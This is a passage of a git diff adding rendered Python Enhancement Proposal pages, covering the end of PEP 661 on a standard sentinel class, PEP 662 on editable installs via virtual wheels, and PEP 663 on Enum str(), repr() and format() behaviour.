  3. They behave unexpectedly after being copied or unpickled, due to a separate +instance being created and thus comparisons using is failing.
  4. +
+

In the ensuing discussion, Victor Stinner supplied a list of currently used +sentinel values in the Python standard library [2]. This showed that the +need for sentinels is fairly common, that there are various implementation +methods used even within the stdlib, and that many of these suffer from at +least one of the three above drawbacks.

+

The discussion did not lead to any clear consensus on whether a standard +implementation method is needed or desirable, whether the drawbacks mentioned +are significant, nor which kind of implementation would be good. The author +of this PEP created an issue on bugs.python.org (now a GitHub issue [3]) +suggesting options for improvement, but that focused on only a single +problematic aspect of a few cases, and failed to gather any support.

+

A poll [4] was created on discuss.python.org to get a clearer sense of +the community’s opinions. After nearly two weeks, significant further, +discussion, and 39 votes, the poll’s results were not conclusive. 40% had +voted for “The status-quo is fine / there’s no need for consistency in +this”, but most voters had voted for one or more standardized solutions. +Specifically, 37% of the voters chose “Consistent use of a new, dedicated +sentinel factory / class / meta-class, also made publicly available in the +stdlib”.

+

With such mixed opinions, this PEP was created to facilitate making a decision +on the subject.

+

While working on this PEP, iterating on various options and implementations +and continuing discussions, the author has come to the opinion that a simple, +good implementation available in the standard library would be worth having, +both for use in the standard library itself and elsewhere.

+
+
+

Rationale

+

The criteria guiding the chosen implementation were:

+
    +
  1. The sentinel objects should behave as expected by a sentinel object: When +compared using the is operator, it should always be considered +identical to itself but never to any other object.
  2. +
  3. Creating a sentinel object should be a simple, straightforward one-liner.
  4. +
  5. It should be simple to define as many distinct sentinel values as needed.
  6. +
  7. The sentinel objects should have a clear and short repr.
  8. +
  9. It should be possible to use clear type signatures for sentinels.
  10. +
  11. The sentinel objects should behave correctly after copying and/or +unpickling.
  12. +
  13. Such sentinels should work when using CPython 3.x and PyPy3, and ideally +also with other implementations of Python.
  14. +
  15. As simple and straightforward as possible, in implementation and especially +in use. Avoid this becoming one more special thing to learn when learning +Python. It should be easy to find and use when needed, and obvious enough +when reading code that one would normally not feel a need to look up its +documentation.
  16. +
+

With so many uses in the Python standard library [2], it would be useful to +have an implementation in the standard library, since the stdlib cannot use +implementations of sentinel objects available elsewhere (such as the +sentinels [5] or sentinel [6] PyPI packages).

+

After researching existing idioms and implementations, and going through many +different possible implementations, an implementation was written which meets +all of these criteria (see Reference Implementation).

+
+
+

Specification

+

A new Sentinel class will be added to a new sentinels module. +Its initializer will accept a single required argument, the name of the +sentinel object, and three optional arguments: the repr of the object, its +boolean value, and the name of its module:

+
>>> from sentinels import Sentinel
+>>> NotGiven = Sentinel('NotGiven')
+>>> NotGiven
+<NotGiven>
+>>> MISSING = Sentinel('MISSING', repr='mymodule.MISSING')
+>>> MISSING
+mymodule.MISSING
+>>> MEGA = Sentinel('MEGA',
+                    repr='<MEGA>',
+                    bool_value=False,
+                    module_name='mymodule')
+<MEGA>
+
+
+

Checking if a value is such a sentinel should be done using the is +operator, as is recommended for None. Equality checks using == will +also work as expected, returning True only when the object is compared +with itself. Identity checks such as if value is MISSING: should usually +be used rather than boolean checks such as if value: or if not value:.

+

Sentinel instances are truthy by default, unlike None. This parallels the +default for arbitrary classes, as well as the boolean value of Ellipsis.

+

The names of sentinels are unique within each module. When calling +Sentinel() in a module where a sentinel with that name was already +defined, the existing sentinel with that name will be returned. Sentinels +with the same name in different modules will be distinct from each other.

+

Creating a copy of a sentinel object, such as by using copy.copy() or by +pickling and unpickling, will return the same object.

+

The module_name optional argument should normally not need to be supplied, +as Sentinel() will usually be able to recognize the module in which it was +called. module_name should be supplied only in unusual cases when this +automatic recognition does not work as intended, such as perhaps when using +Jython or IronPython. This parallels the designs of Enum and +namedtuple. For more details, see PEP 435.

+

The Sentinel class may not be sub-classed, to avoid overly-clever uses +based on it, such as attempts to use it as a base for implementing singletons. +It is considered important that the addition of Sentinel to the stdlib should +add minimal complexity.

+

Ordering comparisons are undefined for sentinel objects.

+
+

Typing

+

To make usage of sentinels clear and simple in typed Python code, we propose to +amend the type system with a special case for sentinel objects.

+

Sentinel objects may be used in +type expressions, representing themselves. +This is similar to how None is handled in the existing type system. For +example:

+
from sentinels import Sentinel
+
+MISSING = Sentinel('MISSING')
+
+def foo(value: int | MISSING = MISSING) -> int:
+    ...
+
+
+

More formally, type checkers should recognize sentinel creations of the form +NAME = Sentinel('NAME') as creating a new sentinel object. If the name +passed to the Sentinel constructor does not match the name the object is +assigned to, type checkers should emit an error.

+

Sentinels defined using this syntax may be used in +type expressions. They +represent a fully static type that has a +single member, the sentinel object itself.

+

Type checkers should support narrowing union types involving sentinels +using the is and is not operators:

+
from sentinels import Sentinel
+from typing import assert_type
+
+MISSING = Sentinel('MISSING')
+
+def foo(value: int | MISSING) -> None:
+    if value is MISSING:
+        assert_type(value, MISSING)
+    else:
+        assert_type(value, int)
+
+
+

To support usage in type expressions, the runtime implementation +of the Sentinel class should have the __or__ and __ror__ +methods, returning typing.Union objects.

+
+
+
+

Backwards Compatibility

+

While not breaking existing code, adding a new “sentinels” stdlib module could +cause some confusion with regard to existing modules named “sentinels”, and +specifically with the “sentinels” package on PyPI.

+

The existing “sentinels” package on PyPI [10] appears to be abandoned, with +the latest release being made on Aug. 2016. Therefore, using this name for a +new stdlib module seems reasonable.

+

If and when this PEP is accepted, it may be worth verifying if this has indeed +been abandoned, and if so asking to transfer ownership to the CPython +maintainers to reduce the potential for confusion with the new stdlib module.

+
+
+

How to Teach This

+

The normal types of documentation of new stdlib modules and features, namely +doc-strings, module docs and a section in “What’s New”, should suffice.

+
+
+

Security Implications

+

This proposal should have no security implications.

+
+
+

Reference Implementation

+

The reference implementation is found in a dedicated GitHub repo [7]. A +simplified version follows:

+
_registry = {}
+
+class Sentinel:
+    """Unique sentinel values."""
+
+    def __new__(cls, name, repr=None, bool_value=True, module_name=None):
+        name = str(name)
+        repr = str(repr) if repr else f'<{name.split(".")[-1]}>'
+        bool_value = bool(bool_value)
+        if module_name is None:
+            try:
+                module_name = \
+                    sys._getframe(1).f_globals.get('__name__', '__main__')
+            except (AttributeError, ValueError):
+                module_name = __name__
+
+        registry_key = f'{module_name}-{name}'
+
+        sentinel = _registry.get(registry_key, None)
+        if sentinel is not None:
+            return sentinel
+
+        sentinel = super().__new__(cls)
+        sentinel._name = name
+        sentinel._repr = repr
+        sentinel._bool_value = bool_value
+        sentinel._module_name = module_name
+
+        return _registry.setdefault(registry_key, sentinel)
+
+    def __repr__(self):
+        return self._repr
+
+    def __bool__(self):
+        return self._bool_value
+
+    def __reduce__(self):
+        return (
+            self.__class__,
+            (
+                self._name,
+                self._repr,
+                self._module_name,
+            ),
+        )
+
+
+
+
+

Rejected Ideas

+
+

Use NotGiven = object()

+

This suffers from all of the drawbacks mentioned in the Rationale section.

+
+
+

Add a single new sentinel value, such as MISSING or Sentinel

+

Since such a value could be used for various things in various places, one +could not always be confident that it would never be a valid value in some use +cases. On the other hand, a dedicated and distinct sentinel value can be used +with confidence without needing to consider potential edge-cases.

+

Additionally, it is useful to be able to provide a meaningful name and repr +for a sentinel value, specific to the context where it is used.

+

Finally, this was a very unpopular option in the poll [4], with only 12% +of the votes voting for it.

+
+
+

Use the existing Ellipsis sentinel value

+

This is not the original intended use of Ellipsis, though it has become +increasingly common to use it to define empty class or function blocks instead +of using pass.

+

Also, similar to a potential new single sentinel value, Ellipsis can’t be +as confidently used in all cases, unlike a dedicated, distinct value.

+
+
+

Use a single-valued enum

+

The suggested idiom is:

+
class NotGivenType(Enum):
+    NotGiven = 'NotGiven'
+NotGiven = NotGivenType.NotGiven
+
+
+

Besides the excessive repetition, the repr is overly long: +<NotGivenType.NotGiven: 'NotGiven'>. A shorter repr can be defined, at +the expense of a bit more code and yet more repetition.

+

Finally, this option was the least popular among the nine options in the +poll [4], being the only option to receive no votes.

+
+
+

A sentinel class decorator

+

The suggested idiom is:

+
@sentinel(repr='<NotGiven>')
+class NotGivenType: pass
+NotGiven = NotGivenType()
+
+
+

While this allows for a very simple and clear implementation of the decorator, +the idiom is too verbose, repetitive, and difficult to remember.

+
+
+

Using class objects

+

Since classes are inherently singletons, using a class as a sentinel value +makes sense and allows for a simple implementation.

+

The simplest version of this is:

+
class NotGiven: pass
+
+
+

To have a clear repr, one would need to use a meta-class:

+
class NotGiven(metaclass=SentinelMeta): pass
+
+
+

… or a class decorator:

+
@Sentinel
+class NotGiven: pass
+
+
+

Using classes this way is unusual and could be confusing. The intention of +code would be hard to understand without comments. It would also cause +such sentinels to have some unexpected and undesirable behavior, such as +being callable.

+
+ +
+
+

Additional Notes

+
    +
  • This PEP and the initial implementation are drafted in a dedicated GitHub +repo [7].
  • +
  • For sentinels defined in a class scope, to avoid potential name clashes, +one should use the fully-qualified name of the variable in the module. Only +the part of the name after the last period will be used for the default +repr. For example:
    >>> class MyClass:
    +...    NotGiven = sentinel('MyClass.NotGiven')
    +>>> MyClass.NotGiven
    +<NotGiven>
    +
    +
    +
  • +
  • One should be careful when creating sentinels in a function or method, since +sentinels with the same name created by code in the same module will be +identical. If distinct sentinel objects are needed, make sure to use +distinct names.
  • +
  • There is no single desirable value for the “truthiness” of sentinels, i.e. +their boolean value. It is sometimes useful for the boolean value to be +True, and sometimes False. Of the built-in sentinels in Python, +None evaluates to False, while Ellipsis (a.k.a. ...) +evaluates to True. The desire for this to be set as needed came up in +discussions as well.
  • +
  • The boolean value of NotImplemented is True, but using this is +deprecated since Python 3.9 (doing so generates a deprecation warning.) +This deprecation is due to issues specific to NotImplemented, as +described in bpo-35712 [8].
  • +
  • To define multiple, related sentinel values, possibly with a defined +ordering among them, one should instead use Enum or something similar.
  • +
  • There was a discussion on the typing-sig mailing list [9] about the typing +for these sentinels, where different options were discussed.
  • +
+
+
+

Open Issues

+
    +
  • Is adding a new stdlib module the right way to go? I could not find any +existing module which seems like a logical place for this. However, adding +new stdlib modules should be done judiciously, so perhaps choosing an +existing module would be preferable even if it is not a perfect fit?
  • +
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0661.rst

+

Last modified: 2024-10-19 14:29:26 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0662/index.html b/pep-0662/index.html new file mode 100644 index 00000000000..224d1c7fdcc --- /dev/null +++ b/pep-0662/index.html @@ -0,0 +1,539 @@ + + + + + + + + PEP 662 – Editable installs via virtual wheels | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 662 – Editable installs via virtual wheels

+
+
Author:
+
Bernát Gábor <gaborjbernat at gmail.com>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
28-May-2021
+
Post-History:
+

+
Resolution:
+
Discourse thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes extensions to the build backend and frontend +communication (as introduced by PEP 517) to allow projects to be installed in +editable mode by introducing virtual wheels.

+
+
+

Motivation

+

During development, many Python users prefer to install their libraries so that +changes to the underlying source code and resources are automatically reflected +in subsequent interpreter invocations without an additional installation step. +This mode is usually called “development mode” or “editable installs”. +Currently, there is no standardized way to accomplish this, as it was explicitly +left out of PEP 517 due to the complexity of the actual observed behaviors.

+

At the moment, users to get this behaviour perform one of the following:

+
    +
  • For just Python code by adding the relevant source directories to +sys.path (configurable from the command line interface via the +PYTHONPATH environment variable). Note in this case, the users have to +install the project dependencies themselves, and entry points or project +metadata are not generated.
  • +
  • setuptools provides the setup.py develop mechanism: that installs a +pth file that injects the project root onto the sys.path at +interpreter startup time, generates the project metadata, and also installs +project dependencies. pip exposes calling this mechanism via the +pip install -e command-line interface.
  • +
  • flit provides the flit install –symlink command that symlinks the +project files into the interpreters purelib folder, generates the +project metadata, and also installs dependencies. Note, this allows +supporting resource files too.
  • +
+

As these examples shows an editable install can be achieved in multiple ways +and at the moment there’s no standard way of doing it. Furthermore, it’s not +clear whose responsibility it is to achieve and define what an editable +installation is:

+
    +
  1. allow the build backend to define and materialize it,
  2. +
  3. allow the build frontend to define and materialize it,
  4. +
  5. explicitly define and standardize one method from the possible options.
  6. +
+

The author of this PEP believes there’s no one size fits all solution here, +each method of achieving editable effect has its pros and cons. Therefore +this PEP rejects option three as it’s unlikely for the community to agree on a +single solution. Furthermore, question remains as to whether the frontend or the +build backend should own this responsibility. PEP 660 proposes the build +backend to own this, while the current PEP proposes primarily the frontend, +but still allows the backend to take take control if it wants to do so.

+
+
+

Rationale

+

PEP 517 deferred “Editable installs” because this would have delayed further +its adoption, and there wasn’t an agreement on how editable installs should be +achieved. Due to the popularity of the setuptools and pip projects, the status +quo prevailed, and the backend could achieve editable mode by providing a +setup.py develop implementation, which the user could trigger via pip +install -e. By defining an editable interface between the +build backend and frontend, we can eliminate the setup.py file and their +current communication method.

+
+
+

Terminology and goals

+

This PEP aims to delineate the frontend and the backend roles clearly and give +the developers of each the maximum ability to provide valuable features to +their users. In this proposal, the backend’s role is to prepare the project for +an editable installation, and then provide enough information to the frontend +so that the frontend can manifest and enforce the editable installation.

+

The information the backend provides to the frontend is a wheel that follows +the existing specification within PEP 427. The wheel metadata about the +archive itself ({distribution}-{version}.dist-info/WHEEL) must also contain +the key Editable with value of true.

+

However, instead of providing the project files within the wheel, it must +provide an editable.json file (at the root level of the wheel) that defines +the files to be exposed by the frontend. The content of this file is formulated +as a mapping of absolute source tree paths to relative target interpreter +destination paths within a scheme mapping.

+

A wheel that satisfies the previous two paragraphs is a virtual wheel. The +frontend’s role is to take the virtual wheel and install the project in +editable mode. The way it achieves this is entirely up to the frontend and is +considered implementation detail.

+

The editable installation mode implies that the source code of the project +being installed is available in a local directory. Once the project is +installed in editable mode, some changes to the project code in the local +source tree will become effective without the need for a new installation step. +At a minimum, changes to the text of non-generated files that existed at the +installation time should be reflected upon the subsequent import of the +package.

+

Some kinds of changes, such as adding or modifying entry points or new +dependencies, require a new installation step to become effective. These changes +are typically made in build backend configuration files (such as +pyproject.toml). This requirement is consistent with the general user +expectation that such modifications will only become effective after +re-installation.

+

While users expect editable installations to behave identically to standard +installations, this may not always be possible and may be in tension with other +user expectations. Depending on how a frontend implements the editable mode, +some differences may be visible, such as the presence of additional files +(compared to a typical installation), either in the source tree or the +interpreter’s installation path.

+

Frontends should seek to minimize differences between the behavior of editable +and standard installations and document known differences.

+

For reference, a non-editable installation works as follows:

+
    +
  1. The developer is using a tool, we’ll call it here the frontend, to +drive the project development (e.g., pip). When the user wants to trigger a +package build and installation of a project, they’ll communicate with the +frontend.
  2. +
  3. The frontend uses a build frontend to trigger the build of a wheel (e.g., +build). The build frontend uses PEP 517 to communicate with the build +backend (e.g. setuptools) - with the build backend installed into a +PEP 518 environment. Once invoked, the backend returns a wheel.
  4. +
  5. The frontend takes the wheel and feeds it to an installer +(e.g., installer) to install the wheel into the target Python interpreter.
  6. +
+
+
+

The Mechanism

+

This PEP adds two optional hooks to the PEP 517 backend interface. One of the +hooks is used to specify the build dependencies of an editable install. The +other hook returns the necessary information via the build frontend the frontend +needs to create an editable install.

+
+

get_requires_for_build_editable

+
def get_requires_for_build_editable(config_settings=None):
+    ...
+
+
+

This hook MUST return an additional sequence of strings containing PEP 508 +dependency specifications, above and beyond those specified in the +pyproject.toml file. The frontend must ensure that these dependencies are +available in the build environment in which the build_editable hook is +called.

+

If not defined, the default implementation is equivalent to returning [].

+
+
+

prepare_metadata_for_build_editable

+
def prepare_metadata_for_build_editable(metadata_directory, config_settings=None):
+    ...
+
+
+

Must create a .dist-info directory containing wheel metadata +inside the specified metadata_directory (i.e., creates a directory +like {metadata_directory}/{package}-{version}.dist-info/). This +directory MUST be a valid .dist-info directory as defined in the +wheel specification, except that it need not contain RECORD or +signatures. The hook MAY also create other files inside this +directory, and a build frontend MUST preserve, but otherwise ignore, such files; +the intention here is that in cases where the metadata depends on build-time +decisions, the build backend may need to record these decisions in +some convenient format for re-use by the actual wheel-building step.

+

This must return the basename (not the full path) of the .dist-info +directory it creates, as a unicode string.

+

If a build frontend needs this information and the method is +not defined, it should call build_editable and look at the resulting +metadata directly.

+
+
+

build_editable

+
def build_editable(self, wheel_directory, config_settings=None,
+                    metadata_directory=None):
+    ...
+
+
+

Must build a .whl file, and place it in the specified wheel_directory. It +must return the basename (not the full path) of the .whl file it creates, +as a unicode string. The wheel file must be of type virtual wheel as defined +under the terminology section.

+

If the build frontend has previously called prepare_metadata_for_build_editable +and depends on the wheel resulting from this call to have metadata +matching this earlier call, then it should provide the path to the created +.dist-info directory as the metadata_directory argument. If this +argument is provided, then build_editable MUST produce a wheel with identical +metadata. The directory passed in by the build frontend MUST be +identical to the directory created by prepare_metadata_for_build_editable, +including any unrecognized files it created.

+

Backends which do not provide the prepare_metadata_for_build_editable hook may +either silently ignore the metadata_directory parameter to build_editable, +or else raise an exception when it is set to anything other than None.

+

The source directory may be read-only, in such cases the backend may raise an +error that the frontend can display to the user. The backend may store intermediate +artifacts in cache locations or temporary directories. The presence or absence of +any caches should not make a material difference to the final result of the build.

+

The content of the editable.json MUST pass against the following JSON schema:

+
{
+  "$schema": "http://json-schema.org/draft-07/schema",
+  "$id": "http://pypa.io/editables.json",
+  "type": "object",
+  "title": "Virtual wheel editable schema.",
+  "required": ["version", "scheme"],
+  "properties": {
+    "version": {
+      "$id": "#/properties/version",
+      "type": "integer",
+      "minimum": 1,
+      "maximum": 1,
+      "title": "The version of the schema."
+    },
+    "scheme": {
+      "$id": "#/properties/scheme",
+      "type": "object",
+      "title": "Files to expose.",
+      "required": ["purelib", "platlib", "data", "headers", "scripts"],
+      "properties": {
+        "purelib": { "$ref": "#/$defs/mapping" },
+        "platlib": { "$ref": "#/$defs/mapping" },
+        "data": { "$ref": "#/$defs/mapping" },
+        "headers": { "$ref": "#/$defs/mapping" },
+        "scripts": { "$ref": "#/$defs/mapping" }
+      },
+      "additionalProperties": true
+    }
+  },
+  "additionalProperties": true,
+  "$defs": {
+    "mapping": {
+      "type": "object",
+      "description": "A mapping of source to target paths. The source is absolute path, the destination is relative path.",
+      "additionalProperties": true
+    }
+  }
+}
+
+
+

For example:

+
{
+   "version": 1,
+   "scheme": {
+      "purelib": {"/src/tree/a.py": "tree/a.py"},
+      "platlib": {},
+      "data": {"/src/tree/py.typed": "tree/py.typed"},
+      "headers": {},
+      "scripts": {}
+   }
+}
+
+
+

The scheme paths map from project source absolute paths to target directory +relative paths. We allow backends to change the project layout from the project +source directory to what the interpreter will see by using the mapping.

+

For example if the backend returns "purelib": {"/me/project/src": ""} this +would mean that expose all files and modules within /me/project/src at the +root of the purelib path within the target interpreter.

+
+
+

Build frontend requirements

+

The build frontend is responsible for setting up the environment for the build +backend to generate the virtual wheel. All recommendations from PEP 517 for +the build wheel hook applies here too.

+
+
+

Frontend requirements

+

The frontend must install the virtual wheel exactly as defined within +PEP 427. Furthermore is responsible for also installing the files defined +within the editable.json file. The manner in which it does is left up to +the frontend, and is encouraged for the frontend to communicate with the user +exactly the method chosen, and what limitations that solution will have.

+

The frontend must create a direct_url.json file in the .dist-info +directory of the installed distribution, in compliance with PEP 610. The url +value must be a file:// URL pointing to the project directory (i.e., the +directory containing pyproject.toml), and the dir_info value must be +{'editable': true}.

+

The frontend can rely on the prepare_metadata_for_build_editable hook when +installing in editable mode.

+

If the frontend concludes it cannot achieve an editable installation with the +information provided by the build backend it should fail and raise an error to +clarify to the user why not.

+

The frontend might implement one or more editable installation mechanisms and +can leave it up to the user the choose one that its optimal to the use case +of the user. For example, pip could add an editable mode flag, and allow the +user to choose between pth files or symlinks ( +pip install -e . --editable-mode=pth vs +pip install -e . --editable-mode=symlink).

+
+
+

Example editable implementations

+

To show how this PEP might be used, we’ll now present a few case studies. Note +the offered solutions are purely for illustration purpose and are not normative +for the frontend/backend.

+
+

Add the source tree as is to the interpreter

+

This is one of the simplest implementations, it will add the source tree as is +into the interpreters scheme paths, the editable.json within the virtual wheel +might look like:

+
{
+  {"version": 1, "scheme": {"purelib": {"<project dir>": "<project dir>"}}}
+}
+
+
+

The frontend then could either:

+
    +
  • Add the source directory onto the target interpreters sys.path during +startup of it. This is done by creating a pth file into the target +interpreters purelib folder. setuptools does this today and is what pip +install -e translate too. This solution is fast and +cross-platform compatible. However, this puts the entire source tree onto the +system, potentially exposing modules that would not be available in a +standard installation case.
  • +
  • Symlink the folder, or the individual files within it. This method is what +flit does via its flit install –symlink. This solution requires the +current platform to support symlinks. Still, it allows potentially to symlink +individual files, which could solve the problem of including files that +should be excluded from the source tree.
  • +
+
+
+

Using custom importers

+

For a more robust and more dynamic collaboration between the build backend and +the target interpreter, we can take advantage of the import system allowing the +registration of custom importers. See PEP 302 for more details and editables +as an example of this. The backend can generate a new importer during the +editable build (or install it as an additional dependency) and register it at +interpreter startup by adding a pth file.

+
{
+   "version": 1,
+   "scheme": {
+      "purelib": {
+        "<project dir>/.editable/_register_importer.pth": "<project dir>/_register_importer.pth".
+        "<project dir>/.editable/_editable_importer.py": "<project dir>/_editable_importer.py"
+      }
+    }
+  }
+}
+
+
+

The backend here registered a hook that is called whenever a new module is +imported, allowing dynamic and on-demand functionality. Potential use cases +where this is useful:

+
    +
  • Expose a source folder, but honor module excludes: the backend may generate +an import hook that consults the exclusion table before allowing a source +file loader to discover a file in the source directory or not.
  • +
  • For a project, let there be two modules, A.py and B.py. These are two +separate files in the source directory; however, while building a wheel, they +are merged into one mega file project.py. In this case, with this PEP, +the backend could generate an import hook that reads the source files at +import time and merges them in memory before materializing it as a module.
  • +
  • Automatically update out-of-date C-extensions: the backend may generate an +import hook that checks the last modified timestamp for a C-extension source +file. If it is greater than the current C-extension binary, trigger an update +by calling the compiler before import.
  • +
+
+
+
+
+

Rejected ideas

+

This PEP competes with PEP 660 and rejects that proposal because we think +the mechanism of achieving an editable installation should be within the +frontend rather than the build backend. Furthermore, this approach allows the +ecosystem to use alternative means to accomplish the editable installation +effect (e.g., insert path on sys.path or symlinks instead of just implying +the loose wheel mode from the backend described by that PEP).

+

Prominently, PEP 660 does not allow using symlinks to expose code and data +files without also extending the wheel file standard with symlink support. It’s +not clear how the wheel format could be extended to support symlinks that refer +not to files within the wheel itself, but files only available on the local +disk. It’s important to note that the backend itself (or backend generated +code) must not generate these symlinks (e.g., at interpreter startup time) as +that would conflict with the frontends book keeping of what files need to be +uninstalled.

+

Finally, PEP 660 adds support only for purelib and platlib files. It +purposefully avoids supporting other types of information that the wheel format +supports: include, data and scripts. With this path the frontend +can support these on a best effort basis via the symlinks mechanism (though +this feature is not universally available - on Windows require enablement). We +believe its beneficial to add best effort support for these file types, rather +than exclude the possibility of supporting them at all.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0662.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0663/index.html b/pep-0663/index.html new file mode 100644 index 00000000000..b4f8e0f5d46 --- /dev/null +++ b/pep-0663/index.html @@ -0,0 +1,500 @@ + + + + + + + + PEP 663 – Standardizing Enum str(), repr(), and format() behaviors | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 663 – Standardizing Enum str(), repr(), and format() behaviors

+
+
Author:
+
Ethan Furman <ethan at stoneleaf.us>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Rejected
+
Type:
+
Informational
+
Created:
+
30-Jun-2021
+
Python-Version:
+
3.11
+
Post-History:
+
20-Jul-2021, 02-Nov-2021
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Update the repr(), str(), and format() of the various Enum types +to better match their intended purpose. For example, IntEnum will have +its str() change to match its format(), while a user-mixed int-enum +will have its format() match its str(). In all cases, an enum’s +str() and format() will be the same (unless the user overrides +format()).

+

Add a global enum decorator which changes the str() and repr() (and +format()) of the decorated enum to be a valid global reference: i.e. +re.IGNORECASE instead of <RegexFlag.IGNORECASE: 2>.

+
+
+

Motivation

+

Having the str() of IntEnum and IntFlag not be the value causes +bugs and extra work when replacing existing constants.

+

Having the str() and format() of an enum member be different can be +confusing.

+

The addition of StrEnum with its requirement to have its str() be its +value is inconsistent with other provided Enum’s str.

+

The iteration of Flag members, which directly affects their repr(), is +inelegant at best, and buggy at worst.

+
+
+

Rationale

+

Enums are becoming more common in the standard library; being able to recognize +enum members by their repr(), and having that repr() be easy to parse, is +useful and can save time and effort in understanding and debugging code.

+

However, the enums with mixed-in data types (IntEnum, IntFlag, and the new +StrEnum) need to be more backwards compatible with the constants they are +replacing – specifically, str(replacement_enum_member) == str(original_constant) +should be true (and the same for format()).

+

IntEnum, IntFlag, and StrEnum should be as close to a drop-in replacement of +existing integer and string constants as is possible. Towards that goal, the +str() output of each should be its inherent value; e.g. if Color is an +IntEnum:

+
>>> Color.RED
+<Color.RED: 1>
+>>> str(Color.RED)
+'1'
+>>> format(Color.RED)
+'1'
+
+
+

Note that format() already produces the correct output, only str() needs +updating.

+

As much as possible, the str(), repr(), and format() of enum members +should be standardized across the standard library. However, up to Python 3.10 +several enums in the standard library have a custom str() and/or repr().

+

The repr() of Flag currently includes aliases, which it should not; fixing that +will, of course, already change its repr() in certain cases.

+
+
+

Specification

+

There are three broad categories of enum usage:

+
    +
  • simple: Enum or Flag +a new enum class is created with no data type mixins
  • +
  • drop-in replacement: IntEnum, IntFlag, StrEnum +a new enum class is created which also subclasses int or str and uses +int.__str__ or str.__str__
  • +
  • user-mixed enums and flags +the user creates their own integer-, float-, str-, whatever-enums instead of +using enum.IntEnum, etc.
  • +
+

There are also two styles:

+
    +
  • normal: the enumeration members remain in their classes and are accessed as +classname.membername, and the class name shows in their repr() and +str() (where appropriate)
  • +
  • global: the enumeration members are copied into their module’s global +namespace, and their module name shows in their repr() and str() +(where appropriate)
  • +
+

Some sample enums:

+
# module: tools.py
+
+class Hue(Enum):  # or IntEnum
+    LIGHT = -1
+    NORMAL = 0
+    DARK = +1
+
+class Color(Flag):  # or IntFlag
+    RED = 1
+    GREEN = 2
+    BLUE = 4
+
+class Grey(int, Enum):  # or (int, Flag)
+   BLACK = 0
+   WHITE = 1
+
+
+

Using the above enumerations, the following two tables show the old and new +output (blank cells indicate no change):

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
stylecategoryenum repr()enum str()enum format()
normalsimple3.10
new
user mixed3.101
newGrey.WHITE
int drop-in3.10Hue.LIGHT
new-1
globalsimple3.10<Hue.LIGHT: -1>Hue.LIGHTHue.LIGHT
newtools.LIGHTLIGHTLIGHT
user mixed3.10<Grey.WHITE: 1Grey.WHITEGrey.WHITE
newtools.WHITEWHITEWHITE
int drop-in3.10<Hue.LIGHT: -1>Hue.LIGHT
newtools.LIGHT-1
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
stylecategoryflag repr()flag str()flag format()
normalsimple3.10<Color.RED|GREEN: 3>Color.RED|GREENColor.RED|GREEN
new<Color(3): RED|GREEN>Color.RED|Color.GREENColor.RED|Color.GREEN
user mixed3.10<Grey.WHITE: 1>1
new<Grey(1): WHITE>Grey.WHITE
int drop-in3.10<Color.RED|GREEN: 3>Color.RED|GREEN
new<Color(3): RED|GREEN>3
globalsimple3.10<Color.RED|GREEN: 3>Color.RED|GREENColor.RED|GREEN
newtools.RED|tools.GREENRED|GREENRED|GREEN
user mixed3.10<Grey.WHITE: 1>Grey.WHITE1
newtools.WHITEWHITEWHITE
int drop-in3.10<Color.RED|GREEN: 3>Color.RED|GREEN
newtools.RED|tools.GREEN3
+

These two tables show the final result:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
stylecategoryenum repr()enum str()enum format()
normalsimple<Hue.LIGHT: -1>Hue.LIGHTHue.LIGHT
user mixed<Grey.WHITE: 1>Grey.WHITEGrey.WHITE
int drop-in<Hue.LIGHT: -1>-1-1
globalsimpletools.LIGHTLIGHTLIGHT
user mixedtools.WHITEWHITEWHITE
int drop-intools.LIGHT-1-1
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
stylecategoryflag repr()flag str()flag format()
normalsimple<Color(3): RED|GREEN>Color.RED|Color.GREENColor.RED|Color.GREEN
user mixed<Grey(1): WHITE>Grey.WHITEGrey.WHITE
int drop-in<Color(3): RED|GREEN>33
globalsimpletools.RED|tools.GREENRED|GREENRED|GREEN
user mixedtools.WHITEWHITEWHITE
int drop-intools.RED|tools.GREEN33
+

As can be seen, repr() is primarily affected by whether the members are +global, while str() is affected by being global or by being a drop-in +replacement, with the drop-in replacement status having a higher priority. +Also, the basic repr() and str() have changed for flags as the old +style was flawed.

+
+
+

Backwards Compatibility

+

Backwards compatibility of stringified objects is not guaranteed across major +Python versions, and there will be backwards compatibility breaks where +software uses the repr(), str(), and format() output of enums in +tests, documentation, data structures, and/or code generation.

+

Normal usage of enum members will not change: re.ASCII can still be used +as re.ASCII and will still compare equal to 256.

+

If the previous output needs to be maintained, for example to ensure +compatibility between different Python versions, software projects will need to +create their own enum base class with the appropriate methods overridden.

+

Note that by changing the str() of the drop-in category, we will actually +prevent future breakage when IntEnum, et al, are used to replace existing +constants.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0663.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
